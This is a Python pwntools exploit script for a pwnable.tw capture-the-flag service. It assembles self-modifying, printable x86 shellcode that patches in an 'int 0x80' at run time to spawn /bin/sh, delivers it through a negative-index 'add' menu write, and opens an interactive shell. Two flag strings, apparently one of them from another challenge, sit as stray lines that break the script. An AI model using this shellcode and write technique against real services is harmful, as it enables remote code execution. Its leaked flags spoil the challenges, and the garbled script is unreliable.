from pwn import *
# x86 (32-bit) assembly source for the payload. It is assembled with asm()
# further down and sent as the "Name" field. The annotations inside the
# string are assembler comments (`;` and `/* */`), not Python comments, so
# they are part of the literal and are kept verbatim. Note the `sub byte ptr
# [eax+0x34/0x35], dl` lines: the bytes that execute are patched at run time,
# so they differ from the bytes as encoded.
shellcode = '''
push 0x68 ;压入/bin/sh
push 0x732f2f2f
push 0x6e69622f
push esp
pop ebx ;ebx指向字符串
push edx
pop eax ;eax指向shellcode地址,用于后面创造int 80
/*构建int 80*/
push 0x52525260
pop edx
sub byte ptr[eax + 0x35] , dl
sub byte ptr[eax + 0x35] , dl
sub byte ptr[eax + 0x34] , dl
push 0x5252523e
pop edx
sub byte ptr[eax + 0x34] , dl
/*构建完成 eax+0x34处为80cd(int 80)*/
/*edx=0*/
push ecx
pop edx
/*eax=0xb*/
push edx
pop eax
xor al, 0x40
xor al, 0x4b
/*补全shellcode长度,到eax+34也就是shellcode+34处*/
push edx
pop edx
push edx
pop edx
'''
# Open the connection to the challenge service; the helper below and the
# final interactive() call all talk through this tube.
p = remote('chall.pwnable.tw', 10201)
def add(idx, name):
    """Drive the remote menu's "add" action.

    Selects option 1, then answers the ``Index :`` and ``Name :`` prompts
    with ``idx`` (stringified) and ``name`` respectively. Uses the
    module-level tube ``p``; returns nothing.
    """
    p.sendline('1')
    # Each prompt is awaited before its answer is sent, in menu order.
    for prompt, answer in (('Index :', str(idx)), ('Name :', name)):
        p.recvuntil(prompt)
        p.sendline(answer)
shellcode = asm(shellcode) + '\x6b\x40' # \x6b\x40 is consumed by the xor sequence that builds int 80
#print p64('jhh///sh/binT[RXh````Z(P5(P5(P4h>>>>Z(P4QZRX4@4Kk@')
print shellcode  # Python 2 print statement; the payload is binary, so the output need not be printable
add(-16,shellcode)  # deliver the assembled payload as the "Name" for index -16
FLAG{F1l3_Str34m_is_4w3s0m3}
FLAG{sh3llc0d3_is_s0_b34ut1ful}
p.interactive()